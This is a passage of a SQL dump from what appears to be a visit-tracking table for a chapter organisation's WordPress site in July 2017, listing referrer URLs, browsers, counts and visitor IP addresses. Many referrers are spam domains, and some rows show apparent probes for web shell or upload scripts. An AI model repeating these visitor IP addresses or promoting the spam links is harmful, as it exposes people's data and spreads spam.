,'Firefox','Windows','34.0','','199.19.104.163','000',1,0),(7602,'2017-07-20','https://omoikiri-japan.ru/','Unknown','Unknown','Unknown','','46.118.158.199','000',3,0),(7603,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','119.200.167.97','000',1,0),(7604,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','39.45.161.199','000',1,0),(7605,'2017-07-20','https://buydissertation.net/','MSIE','Windows','6.0','','37.229.253.71','000',3,0),(7606,'2017-07-20','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',2,0),(7607,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',1,0),(7608,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.115.176','000',2,0),(7609,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','189.208.74.48','000',1,0),(7610,'2017-07-20','http://zphiblgz.org/wp-includes/logo_img.php','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(7611,'2017-07-20','http://y8games-free.com/','Opera','Windows','6.0','','46.118.123.42','000',1,0),(7612,'2017-07-20','http://zphiblgz.org/','Opera Next','Windows','44.5.0355.5627','','223.206.120.151','000',1,0),(7613,'2017-07-20','http://zphiblgz.org/','Opera Next','Windows','44.5.0355.5627','','112.168.67.186','000',1,0),(7614,'2017-07-20','http://zphiblgz.org/','Opera Next','Windows','44.5.0355.5627','','45.3.18.117','000',1,0),(7615,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','49.143.97.179','000',1,0),(7616,'2017-07-20','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(7617,'2017-07-20','http://pavlodar.xkaz.org/','MSIE','Windows','6.0','','46.118.158.199','000',3,0),(7618,'2017-07-20','http://zphiblgz.org/wp-content/themes/sketch/404.php','Chrome','Windows','5.0.375.99','','192.185.176.185','000',1,0),(7619,'2017-07-20','https://landscaping.center/','Unknown','Unknown','Unknown','','178.137.163.108','000',2,0),(7620,'2017-07-20','http://www.zphiblgz.org','MSIE','Windows','10.0','','104.236.68.41','000',2,0),(7621,'2017-07-20','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','104.236.68.41','000',1,0),(7622,'2017-07-20','http://zphiblgz.org','Firefox','Windows','28.0','','104.236.68.41','000',2,0),(7623,'2017-07-20','http://zphiblgz.org','MSIE','Windows','9.0','','104.236.68.41','000',1,0),(7624,'2017-07-20','http://zphiblgz.org','Firefox','Macintosh','29.0','','104.236.68.41','000',2,0),(7625,'2017-07-20','http://zphiblgz.org','Firefox','Windows','29.0','','104.236.68.41','000',1,0),(7626,'2017-07-20','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','104.236.68.41','000',2,0),(7627,'2017-07-20','http://zphiblgz.org/','Chrome','Windows','30.0.1599.101','','46.148.120.150','000',3,0),(7628,'2017-07-20','http://zphiblgz.org','Chrome','Windows','30.0.1599.101','','46.161.62.57','000',1,0),(7629,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','103.203.173.118','000',2,0),(7630,'2017-07-20','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(7631,'2017-07-20','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','66.148.121.112','000',1,0),(7632,'2017-07-20','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(7633,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','125.129.239.99','000',1,0),(7634,'2017-07-20','http://ivanovo.zrus.org/','MSIE','Windows','6.0','','178.137.163.108','000',6,0),(7635,'2017-07-20','http://zphiblgz.org/wp-content/plugins/wp_module-1/wp_msg.php','Chrome','Windows','5.0.375.99','','185.154.131.101','000',1,0),(7636,'2017-07-20','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',1,0),(7637,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','95.211.230.94','000',2,0),(7638,'2017-07-20','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','69.195.247.116','000',5,0),(7639,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','86.58.122.85','000',1,0),(7640,'2017-07-20','https://www.bing.com/','Edge','Windows','14.14393','','73.184.28.31','000',2,0),(7641,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','109.62.28.235','000',2,0),(7642,'2017-07-20','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.22','000',1,0),(7643,'2017-07-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(7644,'2017-07-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(7645,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','212.21.66.6','000',2,0),(7646,'2017-07-20','http://zphiblgz.org','Firefox','Windows','40.1','','152.171.252.51','000',1,0),(7647,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.36.201','000',2,0),(7648,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.34.80.176','000',2,0),(7649,'2017-07-20','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','96.47.226.21','000',2,0),(7650,'2017-07-20','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.211.213.93','000',1,0),(7651,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.73.164','000',1,0),(7652,'2017-07-20','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.70.56.25','000',1,0),(7653,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.56.135.190','000',2,0),(7654,'2017-07-20','http://www.zphiblgz.org/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php','Chrome','Windows','42.0.2311.152','','209.90.225.227','000',1,0),(7655,'2017-07-20','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.136','000',1,0),(7656,'2017-07-20','http://zphiblgz.org','Chrome','Macintosh','59.0.3071.109','','146.185.201.18','000',1,0),(7657,'2017-07-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','151.236.54.211','000',2,0),(7658,'2017-07-20','http://videochat.bz/','MSIE','Windows','6.0','','46.118.123.42','000',4,0),(7659,'2017-07-20','zphiblgz.org','Chrome','Windows','50.0.2661.75','','62.210.190.59','000',2,0),(7660,'2017-07-20','https://www.mb140.ru/','Unknown','Unknown','Unknown','','188.163.72.17','000',1,0),(7661,'2017-07-20','https://minharevisao.com/','MSIE','Windows','6.0','','188.163.72.17','000',7,0),(7662,'2017-07-20','http://zphiblgz.org','Firefox','Windows','50.0','','201.18.18.173','000',5,0),(7663,'2017-07-20','https://ua.tc/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(7664,'2017-07-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7665,'2017-07-20','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.138','000',1,0),(7666,'2017-07-20','http://zphiblgz.org','Firefox','Windows','29.0','','41.33.229.210','000',2,0),(7667,'2017-07-20','http://zphiblgz.org','Firefox','Windows','29.0','','206.214.3.168','000',2,0),(7668,'2017-07-20','http://zphiblgz.org','Firefox','Windows','29.0','','218.25.31.150','000',2,0),(7669,'2017-07-20','http://zphiblgz.org','Firefox','Windows','29.0','','77.69.251.210','000',2,0),(7670,'2017-07-20','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','192.145.239.51','000',1,0),(7671,'2017-07-20','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.1','000',1,0),(7672,'2017-07-20','http://zphiblgz.org','Firefox','Windows','7.0.1','','217.182.76.240','000',1,0),(7673,'2017-07-20','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.8','000',1,0),(7674,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(7675,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.187.7.74','000',1,0),(7676,'2017-07-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','79.124.59.202','000',1,0),(7677,'2017-07-21','http://www.vizitki.net/','MSIE','Windows','6.0','','46.118.123.42','000',1,0),(7678,'2017-07-21','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','76.74.173.244','000',1,0),(7679,'2017-07-21','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.149','000',1,0),(7680,'2017-07-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.121','000',1,0),(7681,'2017-07-21','http://zphiblgz.org','Chrome','Macintosh','59.0.3071.109','','46.148.127.151','000',1,0),(7682,'2017-07-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(7683,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','46.151.144.230','000',2,0),(7684,'2017-07-21','http://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.3','000',1,0),(7685,'2017-07-21','http://zphiblgz.org/wp-content/system_info.php','Chrome','Windows','5.0.375.99','','79.134.3.32','000',1,0),(7686,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.115.87','000',2,0),(7687,'2017-07-21','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','216.169.110.209','000',1,0),(7688,'2017-07-21','http://zphiblgz.org','Firefox','Windows','50.0','','46.118.156.191','000',2,0),(7689,'2017-07-21','http://zphiblgz.org/trd.php','Chrome','Windows','42.0.2311.152','','195.154.251.162','000',1,0),(7690,'2017-07-21','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','89.238.181.94','000',1,0),(7691,'2017-07-21','http://zphiblgz.org','Chrome','Android','59.0.3071.125','','96.244.203.215','000',1,0),(7692,'2017-07-21','http://pornolook.net/','MSIE','Windows','6.0','','46.118.158.199','000',3,0),(7693,'2017-07-21','https://buy-meds24.com/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(7694,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','96.43.142.139','000',2,0),(7695,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','59.183.144.20','000',2,0),(7696,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.62.146','000',4,0),(7697,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.180.157','000',3,0),(7698,'2017-07-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','128.52.128.105','000',1,0),(7699,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(7700,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','197.149.25.210','000',2,0),(7701,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.138.141.208','000',2,0),(7702,'2017-07-21','http://zphiblgz.org','Chrome','Macintosh','59.0.3071.109','','79.110.25.233','000',1,0),(7703,'2017-07-21','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(7704,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','216.239.90.19','000',2,0),(7705,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',3,0),(7706,'2017-07-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(7707,'2017-07-21','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(7708,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(7709,'2017-07-21','http://zphiblgz.org','MSIE','Windows','6.0','','60.13.192.113','000',3,0),(7710,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(7711,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','60.52.52.187','000',1,0),(7712,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','74.70.40.77','000',1,0),(7713,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','158.69.215.7','000',1,0),(7714,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(7715,'2017-07-21','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','193.202.110.25','000',1,0),(7716,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.165','000',2,0),(7717,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',2,0),(7718,'2017-07-21','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.70.89.20','000',1,0),(7719,'2017-07-21','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.151.47','000',1,0),(7720,'2017-07-21','http://www.zphibmaryland.org/chapters/','Safari','Macintosh','10.1.1','','73.178.157.192','000',5,0),(7721,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','46.99.32.247','000',2,0),(7722,'2017-07-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','195.22.8.69','000',2,0),(7723,'2017-07-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(7724,'2017-07-21','http://karaganda.xkaz.org/','MSIE','Windows','7.0','','46.118.158.199','000',3,0),(7725,'2017-07-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.51','000',3,0),(7726,'2017-07-21','http://videochat.ph/','MSIE','Windows','6.0','','46.119.112.177','000',2,0),(7727,'2017-07-21','http://zphiblgz.org','Firefox','Windows','40.1','','109.223.250.180','000',1,0),(7728,'2017-07-21','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.96.183.13','000',2,0),(7729,'2017-07-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.170.164','000',1,0),(7730,'2017-07-22','http://zphiblgz.org/','Firefox','Windows','7.0.1','','188.116.11.181','000',1,0),(7731,'2017-07-22','https://www.souvenirua.com/','MSIE','Windows','6.0','','46.118.112.220','000',4,0),(7732,'2017-07-22','http://zphiblgz.org','MSIE','Windows','10.0','','138.197.73.15','000',2,0),(7733,'2017-07-22','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.74.38.173','000',1,0),(7734,'2017-07-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','77.232.148.60','000',4,0),(7735,'2017-07-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','72.22.186.111','000',1,0),(7736,'2017-07-22','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.77.211','000',3,0),(7737,'2017-07-22','https://vpnmouse.com/','MSIE','Windows','5.5','','46.119.112.177','000',1,0),(7738,'2017-07-22','http://zphiblgz.org','Firefox','Windows','40.1','','91.192.70.21','000',1,0),(7739,'2017-07-22','http://zphiblgz.org','Firefox','Windows','40.1','','203.188.244.244','000',2,0),(7740,'2017-07-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.107.85.62','000',2,0),(7741,'2017-07-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',2,0),(7742,'2017-07-22','http://zphiblgz.org','Firefox','Windows','40.1','','79.180.139.7','000',2,0),(7743,'2017-07-22','http://zphiblgz.org','Firefox','Windows','40.1','','210.195.203.154','000',1,0),(7744,'2017-07-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.202.66','000',2,0),(7745,'2017-07-22','http://zphiblgz.org','Chrome','Android','59.0.3071.125','','96.244.203.215','000',1,0),(7746,'2017-07-22','http://zphiblgz.org','Firefox','Windows','40.1','','113.203.160.158','000',1,0),(7747,'2017-07-22','http://zphiblgz.org','Safari','Macintosh','9.0.1','','66.161.255.74','000',1,0),(7748,'2017-07-22','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',2,0),(7749,'2017-07-22','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','74.220.219.102','000',1,0),(7750,'2017-07-22','http://dvervmoskvu.ru/','MSIE','Windows','5.5','','46.118.158.199','000',4,0),(7751,'2017-07-22','https://www.google.com/','Safari','iPhone','10.0','','100.36.98.55','000',1,0),(7752,'2017-07-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(7753,'2017-07-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',2,0),(7754,'2017-07-22','http://zphiblgz.org/','Firefox','Linux','54.0','','125.141.200.51','000',1,0),(7755,'2017-07-22','https://pl-top.pl/','MSIE','Windows','6.0','','188.163.72.17','000',4,0),(7756,'2017-07-22','http://www.zetmaster.ru/','MSIE','Windows','6.0','','5.248.254.193','000',3,0),(7757,'2017-07-22','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.147','000',2,0),(7758,'2017-07-22','http://zphiblgz.org','Chrome','Chrome OS','55.0.2883.103','','69.143.34.19','000',3,0),(7759,'2017-07-22','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.72.198.198','000',2,0),(7760,'2017-07-22','http://zphiblgz.org','WordPress','Unknown','Unknown','','217.72.198.198','000',1,0),(7761,'2017-07-22','http://videochat.cafe/','Opera','Windows','8.00','','46.119.112.177','000',3,0),(7762,'2017-07-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.51','000',1,0),(7763,'2017-07-22','http://zphiblgz.org','Firefox','Windows','29.0','','218.60.28.126','000',2,0),(7764,'2017-07-22','http://zphiblgz.org','Firefox','Windows','29.0','','171.34.41.93','000',2,0),(7765,'2017-07-22','http://zphiblgz.org/','Firefox','Linux','54.0','','138.128.226.186','000',1,0),(7766,'2017-07-22','http://zphiblgz.org/','Opera','Windows','12.17','','138.128.226.186','000',5,0),(7767,'2017-07-22','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',5,0),(7768,'2017-07-22','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(7769,'2017-07-22','http://zphiblgz.org','Firefox','Windows','40.1','','78.62.197.116','000',1,0),(7770,'2017-07-22','http://www.google.com/','Chrome','Android','59.0.3071.125','','166.216.165.53','000',3,0),(7771,'2017-07-22','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.156','000',1,0),(7772,'2017-07-22','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.135.180.36','000',2,0),(7773,'2017-07-22','http://zphiblgz.org','Chrome','Linux','32.0.1713.88','','104.227.169.94','000',2,0),(7774,'2017-07-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(7775,'2017-07-22','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','85.214.204.9','000',1,0),(7776,'2017-07-22','http://perovograd.ru/profile.php?lookup=3886','Chrome','Windows','28.0.1468.0','','194.135.83.53','000',2,0),(7777,'2017-07-22','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.135','000',1,0),(7778,'2017-07-22','https://www.google.com/','Safari','iPhone','10.0','','69.140.29.93','000',14,0),(7779,'2017-07-22','http://stal-rulon.ru/','Unknown','Unknown','Unknown','','46.119.112.177','000',1,0),(7780,'2017-07-23','https://via-energy-cumpara.com/','Opera','Windows','8.01','','46.118.158.199','000',2,0),(7781,'2017-07-23','http://zphiblgz.org','Firefox','Windows','40.1','','77.54.102.204','000',1,0),(7782,'2017-07-23','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.134','000',1,0),(7783,'2017-07-23','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.10','000',1,0),(7784,'2017-07-23','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.102.148.67','000',1,0),(7785,'2017-07-23','http://zphiblgz.org','Firefox','Windows','40.1','','117.228.22.103','000',2,0),(7786,'2017-07-23','http://zphiblgz.org','Safari','Macintosh','5.1.8','','78.46.156.169','000',1,0),(7787,'2017-07-23','http://zphiblgz.org','Firefox','Windows','14.0.1','','88.99.27.172','000',1,0),(7788,'2017-07-23','http://zphiblgz.org','Safari','Windows','5.0.2','','5.9.112.6','000',1,0),(7789,'2017-07-23','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','184.106.10.129','000',1,0),(7790,'2017-07-23','http://zphiblgz.org','WordPress','Unknown','Unknown','','184.106.10.129','000',1,0),(7791,'2017-07-23','http://video-chat.in/','MSIE','Unknown','6.0','','46.118.112.220','000',2,0),(7792,'2017-07-23','http://zphiblgz.org','MSIE','Windows','6.0','','92.255.99.128','000',1,0),(7793,'2017-07-23','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','69.243.97.76','000',2,0),(7794,'2017-07-23','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(7795,'2017-07-23','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.144','000',1,0),(7796,'2017-07-23','http://zphiblgz.org','Firefox','Windows','40.1','','49.151.145.126','000',1,0),(7797,'2017-07-23','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','195.56.65.181','000',2,0),(7798,'2017-07-23','http://zphiblgz.org','MSIE','Windows','6.0','','31.184.243.234','000',1,0),(7799,'2017-07-23','http://kaliningrad.zrus.org/','Unknown','Unknown','Unknown','','46.118.112.220','000',2,0),(7800,'2017-07-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(7801,'2017-07-23','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',4,0),(7802,'2017-07-23','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','123.56.130.131','000',1,0),(7803,'2017-07-23','http://zphiblgz.org','wp-windowsphone','Unknown','Unknown','','123.56.130.131','000',1,0),(7804,'2017-07-23','http://zphiblgz.org','curl','Unknown','7.47.0','','5.61.44.59','000',1,0),(7805,'2017-07-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.100.224','000',1,0),(7806,'2017-07-23','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',2,0),(7807,'2017-07-23','http://videochat.life/','MSIE','Windows','6.0','','46.119.112.177','000',2,0),(7808,'2017-07-23','http://zphiblgz.org','Mechanize','Unknown','2.7.5','','35.190.163.202','000',1,0),(7809,'2017-07-23','http://aktobe.xkaz.org/','MSIE','Windows','4.01','','46.118.158.199','000',1,0),(7810,'2017-07-23','http://noreferer.win/','Chrome','Windows','58.0.3029.81','','185.36.102.114','000',2,0),(7811,'2017-07-23','http://zphiblgz.org','Chrome','Windows','27.0.1453.90','','5.9.112.6','000',1,0),(7812,'2017-07-23','http://www.zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','159.203.93.103','000',2,0),(7813,'2017-07-23','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','82.165.77.104','000',3,0),(7814,'2017-07-23','http://zphiblgz.org','MSIE','Windows','10.0','','159.203.93.103','000',4,0),(7815,'2017-07-23','http://zphiblgz.org','Chrome','Windows','34.0.1847.137','','159.203.93.103','000',1,0),(7816,'2017-07-23','http://zphiblgz.org','MSIE','Windows','9.0','','159.203.93.103','000',1,0),(7817,'2017-07-23','http://zphiblgz.org','Firefox','Windows','21.0','','159.203.93.103','000',1,0),(7818,'2017-07-23','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.93.103','000',1,0),(7819,'2017-07-23','http://zphiblgz.org','Firefox','Windows','29.0','','159.203.93.103','000',1,0),(7820,'2017-07-23','http://zphiblgz.org','Firefox','Windows','40.1','','177.13.250.75','000',2,0),(7821,'2017-07-23','http://zphiblgz.org','Firefox','Windows','40.1','','90.196.42.109','000',2,0),(7822,'2017-07-23','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.71.62.71','000',2,0),(7823,'2017-07-23','http://zphiblgz.org','Firefox','Windows','40.1','','188.230.216.79','000',1,0),(7824,'2017-07-23','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.60.170.22','000',1,0),(7825,'2017-07-23','http://zphiblgz.org','WordPress','Unknown','Unknown','','185.60.170.22','000',1,0),(7826,'2017-07-24','http://www.zetmaster.ru/','MSIE','Windows','6.0','','5.248.254.193','000',3,0),(7827,'2017-07-24','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','199.58.164.140','000',1,0),(7828,'2017-07-24','http://www.bluehost.com/cgi/info/about_us','Firefox','Windows','36.0','','34.208.21.38','000',1,0),(7829,'2017-07-24','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','43.242.215.197','000',1,0),(7830,'2017-07-24','https://www.google.com/','Chrome','Android','57.0.2987.132','','66.249.84.4','000',1,0),(7831,'2017-07-24','http://zphiblgz.org/history/','Chrome','Android','57.0.2987.132','','66.102.6.144','000',1,0),(7832,'2017-07-24','https://mansparskats.com/','MSIE','Windows','5.5','','188.163.72.17','000',8,0),(7833,'2017-07-24','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','54.89.129.105','000',14,0),(7834,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.141.220','000',1,0),(7835,'2017-07-24','http://zphiblgz.org','Firefox','Linux','46.0','','58.84.22.68','000',2,0),(7836,'2017-07-24','http://zphiblgz.org','Firefox','Windows','45.0','','58.84.22.68','000',1,0),(7837,'2017-07-24','http://zphiblgz.org','Chrome','Linux','56.0.2925.29','','58.84.22.68','000',1,0),(7838,'2017-07-24','http://zphiblgz.org','Chrome','Linux','51.0.2732.85','','58.84.22.68','000',1,0),(7839,'2017-07-24','http://zphiblgz.org','Firefox','Macintosh','45.0','','58.84.22.68','000',1,0),(7840,'2017-07-24','http://zphiblgz.org','Chrome','Macintosh','56.0.2947.64','','58.84.22.68','000',2,0),(7841,'2017-07-24','http://zphiblgz.org','MSIE','Windows','11.0','','58.84.22.68','000',1,0),(7842,'2017-07-24','http://zphiblgz.org','Chrome','Macintosh','49.0.2632.52','','58.84.22.68','000',1,0),(7843,'2017-07-24','http://zphiblgz.org','Chrome','Macintosh','52.0.2767.17','','58.84.22.68','000',1,0),(7844,'2017-07-24','http://zphiblgz.org','Chrome','Macintosh','52.0.2747.38','','58.84.22.68','000',1,0),(7845,'2017-07-24','http://zphiblgz.org','Firefox','Linux','45.0','','58.84.22.68','000',1,0),(7846,'2017-07-24','http://zphiblgz.org','Firefox','Linux','49.0','','58.84.22.68','000',1,0),(7847,'2017-07-24','http://zphiblgz.org','Chrome','Windows','53.0.2825.93','','58.84.22.68','000',1,0),(7848,'2017-07-24','http://zphiblgz.org','MSIE','Windows','9.0','','58.84.22.68','000',1,0),(7849,'2017-07-24','http://zphiblgz.org','Firefox','Windows','49.0','','58.84.22.68','000',1,0),(7850,'2017-07-24','http://zphiblgz.org','Firefox','Windows','48.0','','58.84.22.68','000',1,0),(7851,'2017-07-24','http://zphiblgz.org','Firefox','Macintosh','50.0','','58.84.22.68','000',1,0),(7852,'2017-07-24','https://maslenka.kz/','Unknown','Unknown','Unknown','','46.118.112.220','000',1,0),(7853,'2017-07-24','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(7854,'2017-07-24','http://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.210.232.88','000',1,0),(7855,'2017-07-24','http://zphiblgz.org/contact/','Chrome','Windows','30.0.1599.12785','','155.133.82.107','000',3,0),(7856,'2017-07-24','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.34.192.46','000',1,0),(7857,'2017-07-24','http://zphiblgz.org','Firefox','Windows','24.0','','136.243.67.139','000',1,0),(7858,'2017-07-24','http://zphiblgz.org','MSIE','Windows','10.0','','136.243.67.139','000',1,0),(7859,'2017-07-24','http://www.google.com/','Chrome','Android','58.0.3029.83','','174.204.0.150','000',1,0),(7860,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','173.239.230.39','000',2,0),(7861,'2017-07-24','http://zphiblgz.org','Firefox','Windows','40.1','','5.14.108.37','000',2,0),(7862,'2017-07-24','http://dvervmoskvu.ru/','MSIE','Windows','7.0','','46.118.158.199','000',3,0),(7863,'2017-07-24','http://smsactivator.ru/','Opera','Windows','9.0','','188.163.72.17','000',3,0),(7864,'2017-07-24','http://chatroulette.world/','Unknown','Unknown','Unknown','','46.119.112.177','000',3,0),(7865,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',2,0),(7866,'2017-07-24','http://kirov.zrus.org/','MSIE','Windows','6.0','','46.118.112.220','000',2,0),(7867,'2017-07-24','https://www.bing.com/','MSIE','Windows','11.0','','136.181.195.65','000',6,0),(7868,'2017-07-24','http://komp-pomosch.ru/','MSIE','Windows','6.0','','188.163.72.17','000',3,0),(7869,'2017-07-24','http://zphiblgz.org','Firefox','Windows','2.0.0.6','','212.237.34.48','000',1,0),(7870,'2017-07-24','https://woweb.com.ua/','MSIE','Windows','6.0','','46.119.112.177','000',4,0),(7871,'2017-07-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(7872,'2017-07-24','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',3,0),(7873,'2017-07-24','http://zphiblgz.org','Firefox','Windows','40.1','','180.253.78.226','000',1,0),(7874,'2017-07-24','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',2,0),(7875,'2017-07-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.53.184.5','000',1,0),(7876,'2017-07-24','http://uptime-alpha.net/zphiblgz.org','U